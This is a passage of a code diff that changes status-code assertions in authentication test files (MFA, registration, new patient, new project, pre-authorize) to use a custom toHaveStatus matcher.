+    expect(profileRes).toHaveStatus(200);
     expect(profileRes.body.mfaEnrollRequired).toBe(true);
     expect(profileRes.body.code).toBeUndefined();
   });
@@ -1403,7 +1403,7 @@ describe('MFA', () => {
     await setUserMfaRequired(user, true);
 
     const login = await request(app).post('/auth/login').type('json').send({ email, password, scope: 'openid' });
-    expect(login.status).toBe(200);
+    expect(login).toHaveStatus(200);
     expect(login.body.mfaEnrollRequired).toBe(true);
     expect(login.body.code).toBeUndefined();
     // Gated before the membership list is offered.
@@ -1425,7 +1425,7 @@ describe('MFA', () => {
       .post('/auth/profile')
       .type('json')
       .send({ login: login.body.login, profile: membershipA.id });
-    expect(profileRes.status).toBe(200);
+    expect(profileRes).toHaveStatus(200);
     expect(profileRes.body.mfaEnrollRequired).toBe(true);
     expect(profileRes.body.code).toBeUndefined();
   });
@@ -1453,7 +1453,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'totp' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Missing token'));
   });
 
@@ -1487,7 +1487,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: 123 });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
   });
 
@@ -1502,7 +1502,7 @@ describe('MFA', () => {
 
   test('login-enroll requires a login', async () => {
     const res = await request(app).post('/auth/mfa/login-enroll').type('json').send({});
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Missing login');
   });
 
@@ -1525,7 +1525,7 @@ describe('MFA', () => {
 
     // The password login should require MFA enrollment
     const loginRes = await request(app).post('/auth/login').type('json').send({ email, password, scope: 'openid' });
-    expect(loginRes.status).toBe(200);
+    expect(loginRes).toHaveStatus(200);
     expect(loginRes.body.mfaEnrollRequired).toBe(true);
 
     // Enroll in email-based MFA via login-enroll. No token is supplied here;
@@ -1537,7 +1537,7 @@ describe('MFA', () => {
       .post('/auth/mfa/login-enroll')
       .type('json')
       .send({ login: loginRes.body.login, method: 'email' });
-    expect(enrollRes.status).toBe(200);
+    expect(enrollRes).toHaveStatus(200);
     expect(enrollRes.body.mfaRequired).toBe(true);
     expect(enrollRes.body.mfaMethods).toEqual(['email']);
     expect(enrollRes.body.code).not.toBeDefined();
@@ -1554,7 +1554,7 @@ describe('MFA', () => {
       .post('/auth/mfa/verify')
       .type('json')
       .send({ login: loginRes.body.login, token: code });
-    expect(verifyRes.status).toBe(200);
+    expect(verifyRes).toHaveStatus(200);
     expect(verifyRes.body.code).toBeDefined();
 
     const systemRepo = getGlobalSystemRepo();
@@ -1593,7 +1593,7 @@ describe('MFA', () => {
       .post('/auth/mfa/login-enroll')
       .type('json')
       .send({ login: loginRes.body.login, method: 'email' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Already enrolled'));
   });
 
@@ -1618,7 +1618,7 @@ describe('MFA', () => {
     expect(loginRes.body.mfaEnrollRequired).toBe(true);
 
     const res = await request(app).post('/auth/mfa/login-enroll').type('json').send({ login: loginRes.body.login });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Secret not found'));
   });
 
@@ -1644,7 +1644,7 @@ describe('MFA', () => {
     expect(loginRes.body.mfaEnrollRequired).toBe(true);
 
     const res = await request(app).post('/auth/mfa/login-enroll').type('json').send({ login: loginRes.body.login });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Missing token'));
   });
 
@@ -1673,7 +1673,7 @@ describe('MFA', () => {
       .post('/auth/mfa/login-enroll')
       .type('json')
       .send({ login: loginRes.body.login, token: authenticator.generate(secret) });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // The user should now be enrolled in TOTP and the login granted a code
     expect(res.body.code).toBeDefined();
@@ -1710,7 +1710,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email', token: authenticator.generate(secret) });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('User not enrolled in MFA method'));
   });
 
@@ -1817,7 +1817,7 @@ describe('MFA', () => {
             .set('Authorization', `Bearer ${accessToken}`)
             .type('json')
             .send({ method: factor, token });
-          expect(res.status).toBe(400);
+          expect(res).toHaveStatus(400);
           expect(res.body).toMatchObject(badRequest('Cannot remove the last MFA factor because MFA is required'));
 
           // The factor is still enrolled — the rejection left the user untouched.
@@ -1868,7 +1868,7 @@ describe('MFA', () => {
     // A password login is still challenged for MFA verification and is not yet
     // granted an authorization code.
     const loginRes = await request(app).post('/auth/login').type('json').send({ email, password, scope: 'openid' });
-    expect(loginRes.status).toBe(200);
+    expect(loginRes).toHaveStatus(200);
     expect(loginRes.body.mfaRequired).toBe(true);
     expect(loginRes.body.mfaMethods).toEqual(['totp']);
     expect(loginRes.body.code).toBeUndefined();
@@ -1878,7 +1878,7 @@ describe('MFA', () => {
       .post('/auth/mfa/verify')
       .type('json')
       .send({ login: loginRes.body.login, token: authenticator.generate(secret) });
-    expect(verify.status).toBe(200);
+    expect(verify).toHaveStatus(200);
     expect(verify.body.code).toBeDefined();
   });
 
@@ -1966,7 +1966,7 @@ describe('MFA', () => {
         password: 'password!@#',
         scope: 'openid',
       });
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       return res.body;
     }
 
@@ -1997,7 +1997,7 @@ describe('MFA', () => {
       const secret = await makeLegacyEnrolledTotpUser(accessToken, user);
 
       const res = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       // The field old clients read:
       expect(res.body.enrolled).toBe(true);
       // For an already-enrolled user the secret must NOT be regenerated.
@@ -2016,7 +2016,7 @@ describe('MFA', () => {
 
       // Missing token -> validator rejects exactly as before.
       const missing = await request(app).post('/auth/mfa/verify').type('json').send({ login: login.login, token: '' });
-      expect(missing.status).toBe(400);
+      expect(missing).toHaveStatus(400);
       expect(missing.body.issue[0].details.text).toBe('Missing token');
 
       // Invalid token -> historical 'Invalid MFA token'.
@@ -2024,7 +2024,7 @@ describe('MFA', () => {
         .post('/auth/mfa/verify')
         .type('json')
         .send({ login: login.login, token: '000000' });
-      expect(invalid.status).toBe(400);
+      expect(invalid).toHaveStatus(400);
       expect(invalid.body.issue[0].details.text).toBe('Invalid MFA token');
 
       // Valid TOTP token -> success with an auth code, no method field needed.
@@ -2032,7 +2032,7 @@ describe('MFA', () => {
         .post('/auth/mfa/verify')
         .type('json')
         .send({ login: login.login, token: authenticator.generate(secret) });
-      expect(ok.status).toBe(200);
+      expect(ok).toHaveStatus(200);
       expect(ok.body.code).toBeDefined();
     });
 
@@ -2060,7 +2060,7 @@ describe('MFA', () => {
         .set('Authorization', `Bearer ${accessToken}`)
         .type('json')
         .send({ token: authenticator.generate(secret) });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toBe('Already enrolled');
     });
 
@@ -2085,7 +2085,7 @@ describe('MFA', () => {
         .post('/auth/mfa/login-enroll')
         .type('json')
         .send({ login: login.login, token: authenticator.generate(secret) });
-      expect(enroll.status).toBe(200);
+      expect(enroll).toHaveStatus(200);
       expect(enroll.body.code).toBeDefined();
 
       // The user is now enrolled and the method was backfilled to totp.
@@ -2098,7 +2098,7 @@ describe('MFA', () => {
       const { accessToken, user, email } = await registerLegacyAccount();
 
       const statusRes = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-      expect(statusRes.status).toBe(200);
+      expect(statusRes).toHaveStatus(200);
       await withTestContext(async () => {
         const systemRepo = getGlobalSystemRepo();
         const current = await systemRepo.readResource<User>('User', user.id);
@@ -2109,7 +2109,7 @@ describe('MFA', () => {
       expect(login.mfaEnrollRequired).toBe(true);
 
       const res = await request(app).post('/auth/mfa/login-enroll').type('json').send({ login: login.login });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toBe('Missing token');
     });
 
@@ -2123,7 +2123,7 @@ describe('MFA', () => {
         .post('/auth/mfa/disable')
         .set('Authorization', `Bearer ${accessToken}`)
         .type('json');
-      expect(missing.status).toBe(400);
+      expect(missing).toHaveStatus(400);
       expect(missing.body).toMatchObject(badRequest('Missing token'));
 
       // Invalid token -> historical 'Invalid token'.
@@ -2132,7 +2132,7 @@ describe('MFA', () => {
         .set('Authorization', `Bearer ${accessToken}`)
         .type('json')
         .send({ token: 'invalid' });
-      expect(invalid.status).toBe(400);
+      expect(invalid).toHaveStatus(400);
       expect(invalid.body).toMatchObject(badRequest('Invalid token'));
 
       // Valid TOTP token, no method -> full disable.
@@ -2141,7 +2141,7 @@ describe('MFA', () => {
         .set('Authorization', `Bearer ${accessToken}`)
         .type('json')
         .send({ token: authenticator.generate(oldSecret) });
-      expect(ok.status).toBe(200);
+      expect(ok).toHaveStatus(200);
       expect(ok.body).toMatchObject(allOk);
 
       // User is fully disabled, methods cleared, and the secret was rotated
@@ -2161,7 +2161,7 @@ describe('MFA', () => {
         .set('Authorization', `Bearer ${accessToken}`)
         .type('json')
         .send({ token: authenticator.generate(oldSecret) });
-      expect(again.status).toBe(400);
+      expect(again).toHaveStatus(400);
       expect(again.body).toMatchObject(badRequest('User not enrolled in MFA'));
     });
 
@@ -2172,7 +2172,7 @@ describe('MFA', () => {
         .set('Authorization', `Bearer ${accessToken}`)
         .type('json')
         .send({ token: '123' });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body).toMatchObject(badRequest('User not enrolled in MFA'));
     });
 
@@ -2193,7 +2193,7 @@ describe('MFA', () => {
       await makeLegacyEnrolledTotpUser(accessToken, user);
 
       const res = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.body.allowedMethods).toEqual(['totp']);
 
       // Enrolling email is rejected when the project hasn't opted in: the
@@ -2203,7 +2203,7 @@ describe('MFA', () => {
         .set('Authorization', `Bearer ${accessToken}`)
         .type('json')
         .send({ method: 'email' });
-      expect(enrollEmail.status).toBe(400);
+      expect(enrollEmail).toHaveStatus(400);
       expect(enrollEmail.body.issue[0].details.text).toBe('MFA method not allowed');
     });
 
@@ -2225,7 +2225,7 @@ describe('MFA', () => {
         .post('/auth/mfa/verify')
         .type('json')
         .send({ login: login.login, token: authenticator.generate(secret) });
-      expect(verify.status).toBe(200);
+      expect(verify).toHaveStatus(200);
       expect(verify.body.code).toBeDefined();
     });
   });

--- a/packages/server/src/auth/newpatient.test.ts
+++ b/packages/server/src/auth/newpatient.test.ts
@@ -50,20 +50,20 @@ describe('New patient', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const res2 = await request(app).post('/auth/newproject').type('json').send({
       login: res1.body.login,
       projectName: 'Christina Project',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res2.body.code,
       code_verifier: 'xyz',
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     const projectId = resolveId(res3.body.project) as string;
 
@@ -82,13 +82,13 @@ describe('New patient', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
 
     const res5 = await request(app).post('/auth/newpatient').type('json').send({
       login: res4.body.login,
       projectId: projectId,
     });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     expect(res5.body.code).toBeDefined();
 
     // Try to reuse the login
@@ -97,20 +97,20 @@ describe('New patient', () => {
       login: res4.body.login,
       projectId,
     });
-    expect(res6.status).toBe(400);
+    expect(res6).toHaveStatus(400);
 
     // Try to register as a patient without a login
     // (This should fail)
     const res7 = await request(app).post('/auth/newpatient').type('json').send({
       projectId,
     });
-    expect(res7.status).toBe(400);
+    expect(res7).toHaveStatus(400);
 
     // Get the Patient
     const res8 = await request(app)
       .get(`/fhir/R4/Patient`)
       .set('Authorization', 'Bearer ' + res3.body.access_token);
-    expect(res8.status).toBe(200);
+    expect(res8).toHaveStatus(200);
 
     const patient = res8.body.entry[0].resource as Patient;
 
@@ -134,7 +134,7 @@ describe('New patient', () => {
         code: { text: 'test' },
         subject: createReference(patient),
       });
-    expect(res9.status).toBe(201);
+    expect(res9).toHaveStatus(201);
 
     // Create an observation for a different patient
     const res10 = await request(app)
@@ -147,7 +147,7 @@ describe('New patient', () => {
         code: { text: 'test' },
         subject: { reference: randomUUID() },
       });
-    expect(res10.status).toBe(201);
+    expect(res10).toHaveStatus(201);
 
     // Login as the patient
     const res11 = await request(app).post('/oauth2/token').type('form').send({
@@ -155,13 +155,13 @@ describe('New patient', () => {
       code: res5.body.code,
       code_verifier: 'xyz',
     });
-    expect(res11.status).toBe(200);
+    expect(res11).toHaveStatus(200);
 
     // Make sure that the patient can only access their observations
     const res12 = await request(app)
       .get(`/fhir/R4/Observation`)
       .set('Authorization', 'Bearer ' + res11.body.access_token);
-    expect(res12.status).toBe(200);
+    expect(res12).toHaveStatus(200);
     expect(res12.body.entry).toHaveLength(1);
     expect(res12.body.entry[0].resource.id).toStrictEqual(res9.body.id);
   });
@@ -182,20 +182,20 @@ describe('New patient', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const res2 = await request(app).post('/auth/newproject').type('json').send({
       login: res1.body.login,
       projectName: 'Christina Project',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res2.body.code,
       code_verifier: 'xyz',
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     const projectId = resolveId(res3.body.project) as string;
 
@@ -218,13 +218,13 @@ describe('New patient', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
 
     // Patient registration should fail without a default policy
     const res5 = await request(app).post('/auth/newpatient').type('json').send({
       login: res4.body.login,
       projectId,
     });
-    expect(res5.status).toBe(400);
+    expect(res5).toHaveStatus(400);
   });
 });

--- a/packages/server/src/auth/newproject.test.ts
+++ b/packages/server/src/auth/newproject.test.ts
@@ -47,38 +47,38 @@ describe('New project', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const res2 = await request(app).post('/auth/newproject').type('json').send({
       login: res1.body.login,
       projectName: 'Hamilton Project',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res2.body.code,
       code_verifier: 'xyz',
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     const res4 = await request(app)
       .get(`/fhir/R4/${res3.body.profile.reference}`)
       .set('Authorization', 'Bearer ' + res3.body.access_token);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
 
     // Try to reuse the login (this should fail)
     const res5 = await request(app).post('/auth/newproject').type('json').send({
       login: res1.body.login,
       projectName: 'Hamilton Project',
     });
-    expect(res5.status).toBe(400);
+    expect(res5).toHaveStatus(400);
 
     // Try without a login (this should fail)
     const res6 = await request(app).post('/auth/newproject').type('json').send({
       projectName: 'Hamilton Project',
     });
-    expect(res6.status).toBe(400);
+    expect(res6).toHaveStatus(400);
   });
 
   test('Default ClientApplication is restricted to project', async () => {
@@ -100,20 +100,20 @@ describe('New project', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(user1_res1.status).toBe(200);
+    expect(user1_res1).toHaveStatus(200);
 
     const user1_res2 = await request(app).post('/auth/newproject').type('json').send({
       login: user1_res1.body.login,
       projectName: 'User1 Project',
     });
-    expect(user1_res2.status).toBe(200);
+    expect(user1_res2).toHaveStatus(200);
 
     const user1_res3 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: user1_res2.body.code,
       code_verifier: 'xyz',
     });
-    expect(user1_res3.status).toBe(200);
+    expect(user1_res3).toHaveStatus(200);
 
     const user1_res4 = await request(app)
       .post(`/fhir/R4/Patient`)
@@ -128,7 +128,7 @@ describe('New project', () => {
           },
         ],
       });
-    expect(user1_res4.status).toBe(201);
+    expect(user1_res4).toHaveStatus(201);
 
     const patient = user1_res4.body;
 
@@ -144,33 +144,33 @@ describe('New project', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(user2_res1.status).toBe(200);
+    expect(user2_res1).toHaveStatus(200);
 
     const user2_res2 = await request(app).post('/auth/newproject').type('json').send({
       login: user2_res1.body.login,
       projectName: 'User2 Project',
     });
-    expect(user2_res2.status).toBe(200);
+    expect(user2_res2).toHaveStatus(200);
 
     const user2_res3 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: user2_res2.body.code,
       code_verifier: 'xyz',
     });
-    expect(user2_res3.status).toBe(200);
+    expect(user2_res3).toHaveStatus(200);
 
     // Try to access User1 patient using User2 directly
     // This should fail
     const user2_res4 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}`)
       .set('Authorization', 'Bearer ' + user2_res3.body.access_token);
-    expect(user2_res4.status).toBe(404);
+    expect(user2_res4).toHaveStatus(404);
 
     // Get the client
     const user2_res5 = await request(app)
       .get(`/fhir/R4/ClientApplication`)
       .set('Authorization', 'Bearer ' + user2_res3.body.access_token);
-    expect(user2_res5.status).toBe(200);
+    expect(user2_res5).toHaveStatus(200);
     expect(user2_res5.body.entry).toHaveLength(1);
 
     const client = user2_res5.body.entry[0].resource;
@@ -181,7 +181,7 @@ describe('New project', () => {
       client_id: client.id,
       client_secret: client.secret,
     });
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body.error).toBeUndefined();
     expect(res6.body.access_token).toBeDefined();
 
@@ -190,14 +190,14 @@ describe('New project', () => {
     const res7 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}`)
       .set('Authorization', 'Bearer ' + res6.body.access_token);
-    expect(res7.status).toBe(404);
+    expect(res7).toHaveStatus(404);
 
     // Try to search for patients using User2 client
     // This should return empty set
     const res8 = await request(app)
       .get(`/fhir/R4/Patient`)
       .set('Authorization', 'Bearer ' + res6.body.access_token);
-    expect(res8.status).toBe(200);
+    expect(res8).toHaveStatus(200);
     expect(res8.body.entry).toBeUndefined();
   });
 
@@ -219,20 +219,20 @@ describe('New project', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(user1_res1.status).toBe(200);
+    expect(user1_res1).toHaveStatus(200);
 
     const user1_res2 = await request(app).post('/auth/newproject').type('json').send({
       login: user1_res1.body.login,
       projectName: 'User1 Project',
     });
-    expect(user1_res2.status).toBe(200);
+    expect(user1_res2).toHaveStatus(200);
 
     const user1_res3 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: user1_res2.body.code,
       code_verifier: 'xyz',
     });
-    expect(user1_res3.status).toBe(200);
+    expect(user1_res3).toHaveStatus(200);
 
     const user1_res4 = await request(app)
       .post(`/fhir/R4/Patient`)
@@ -247,7 +247,7 @@ describe('New project', () => {
           },
         ],
       });
-    expect(user1_res4.status).toBe(201);
+    expect(user1_res4).toHaveStatus(201);
 
     const user2_res1 = await request(app)
       .post('/auth/newuser')
@@ -261,20 +261,20 @@ describe('New project', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(user2_res1.status).toBe(200);
+    expect(user2_res1).toHaveStatus(200);
 
     const user2_res2 = await request(app).post('/auth/newproject').type('json').send({
       login: user2_res1.body.login,
       projectName: 'User2 Project',
     });
-    expect(user2_res2.status).toBe(200);
+    expect(user2_res2).toHaveStatus(200);
 
     const user2_res3 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: user2_res2.body.code,
       code_verifier: 'xyz',
     });
-    expect(user2_res3.status).toBe(200);
+    expect(user2_res3).toHaveStatus(200);
 
     // Try to access User1 patient using User2 graphql
     // This should fail
@@ -291,7 +291,7 @@ describe('New project', () => {
           }
         }`,
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     expect(res5.body.data).toBeDefined();
     expect(res5.body.data.PatientList).toBeDefined();
     expect(res5.body.data.PatientList.length).toStrictEqual(0);
@@ -312,13 +312,13 @@ describe('New project', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const res2 = await request(app).post('/auth/newproject').type('json').send({
       login: res1.body.login,
       projectName: 'Hamilton Project',
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body).toMatchObject(badRequest('Email verification is required to create a project'));
   });
 
@@ -335,7 +335,7 @@ describe('New project', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const systemRepo = getGlobalSystemRepo();
     await systemRepo.conditionalPatch(
@@ -347,6 +347,6 @@ describe('New project', () => {
       login: res1.body.login,
       projectName: 'Hamilton Project',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 });

--- a/packages/server/src/auth/newuser.test.ts
+++ b/packages/server/src/auth/newuser.test.ts
@@ -56,7 +56,7 @@ describe('New user', () => {
         projectId: 'new',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.login).toBeDefined();
     expect(res.body.code).toBeUndefined();
     expect(res.body.emailVerificationRequired).toStrictEqual(false);
@@ -75,7 +75,7 @@ describe('New user', () => {
         recaptchaToken: 'xyz',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Registration is disabled');
   });
 
@@ -90,7 +90,7 @@ describe('New user', () => {
         password: 'password!@#',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Recaptcha token is required');
   });
 
@@ -108,7 +108,7 @@ describe('New user', () => {
         recaptchaToken: 'wrong',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Recaptcha failed');
   });
 
@@ -122,7 +122,7 @@ describe('New user', () => {
     };
 
     const res = await request(app).post('/auth/newuser').type('json').send(registerRequest);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Password must be between 8 and 72 characters');
   });
 
@@ -136,7 +136,7 @@ describe('New user', () => {
     };
 
     const res = await request(app).post('/auth/newuser').type('json').send(registerRequest);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Password must be between 8 and 72 characters');
   });
 
@@ -153,7 +153,7 @@ describe('New user', () => {
     };
 
     const res = await request(app).post('/auth/newuser').type('json').send(registerRequest);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Password must be between 8 and 72 characters');
   });
 
@@ -172,7 +172,7 @@ describe('New user', () => {
         recaptchaToken: 'wrong',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Password found in breach database', 'password'));
   });
 
@@ -186,10 +186,10 @@ describe('New user', () => {
     };
 
     const res = await request(app).post('/auth/newuser').type('json').send(registerRequest);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/auth/newuser').type('json').send(registerRequest);
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].details.text).toBe('Email already registered');
   });
 
@@ -241,7 +241,7 @@ describe('New user', () => {
         recaptchaToken: 'xyz',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.login).toBeDefined();
     expect(res.body.code).toBeUndefined();
   });
@@ -294,7 +294,7 @@ describe('New user', () => {
         recaptchaToken: 'xyz',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.details?.text).toBe('Invalid recaptchaSiteKey');
   });
 
@@ -345,7 +345,7 @@ describe('New user', () => {
         recaptchaToken: 'xyz',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Project does not allow open registration');
   });
 
@@ -361,7 +361,7 @@ describe('New user', () => {
         recaptchaSiteKey: randomUUID(),
         recaptchaToken: 'xyz',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.details?.text).toBe('Invalid recaptchaSiteKey');
   });
 
@@ -406,7 +406,7 @@ describe('New user', () => {
         recaptchaSiteKey,
         recaptchaToken: 'xyz',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.details?.text).toBe('Invalid recaptchaSecretKey');
   });
 
@@ -462,7 +462,7 @@ describe('New user', () => {
         password,
         recaptchaToken: 'xyz',
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
     expect(res1.body.code).toBeUndefined();
 
@@ -478,7 +478,7 @@ describe('New user', () => {
         password,
         recaptchaToken: 'xyz',
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.login).toBeDefined();
     expect(res2.body.code).toBeUndefined();
 
@@ -495,7 +495,7 @@ describe('New user', () => {
         password,
         recaptchaToken: 'xyz',
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.login).toBeDefined();
     expect(res3.body.code).toBeUndefined();
 
@@ -512,7 +512,7 @@ describe('New user', () => {
         password,
         recaptchaToken: 'xyz',
       });
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
     expect(res4.body.login).toBeUndefined();
     expect(res4.body.code).toBeUndefined();
     expect(res4.body).toMatchObject({
@@ -540,7 +540,7 @@ describe('New user', () => {
         password,
         recaptchaToken: 'xyz',
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     expect(res5.body.login).toBeDefined();
     expect(res5.body.code).toBeUndefined();
 
@@ -556,7 +556,7 @@ describe('New user', () => {
         password,
         recaptchaToken: 'xyz',
       });
-    expect(res6.status).toBe(404);
+    expect(res6).toHaveStatus(404);
     expect(res6.body.login).toBeUndefined();
     expect(res6.body.code).toBeUndefined();
   });
@@ -581,7 +581,7 @@ describe('New user', () => {
       recaptchaToken: 'xyz',
     });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Read the User back directly and assert meta.project is set
     const systemRepo = getGlobalSystemRepo();
@@ -603,7 +603,7 @@ describe('New user', () => {
       recaptchaToken: 'xyz',
     });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const systemRepo = getGlobalSystemRepo();
     const bundle = await systemRepo.search<User>({
@@ -626,7 +626,7 @@ describe('New user', () => {
         password: 'password!@#',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.login).toBeDefined();
     expect(res.body.code).toBeUndefined();
   });
@@ -645,7 +645,7 @@ describe('New user', () => {
         projectId: 'new',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.login).toBeDefined();
     expect(res.body.code).toBeUndefined();
     expect(res.body.emailVerificationRequired).toBe(true);

--- a/packages/server/src/auth/preauthorize.test.ts
+++ b/packages/server/src/auth/preauthorize.test.ts
@@ -41,7 +41,7 @@ describe('Pre-authorize', () => {
 
   test('Requires auth', async () => {
     const res = await request(app).post('/auth/preauthorize').type('json').send({ clientId: client.id });
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Requires project admin', async () => {
@@ -50,7 +50,7 @@ describe('Pre-authorize', () => {
       .set('Authorization', `Bearer ${testAccount.accessToken}`)
       .type('json')
       .send({ clientId: client.id });
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Requires clientId', async () => {
@@ -59,7 +59,7 @@ describe('Pre-authorize', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({});
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Client ID is required'));
   });
 
@@ -69,7 +69,7 @@ describe('Pre-authorize', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ clientId: client.id });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Pre-authorization requires onBehalfOfMembership'));
   });
 
@@ -80,7 +80,7 @@ describe('Pre-authorize', () => {
       .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount.profile))
       .type('json')
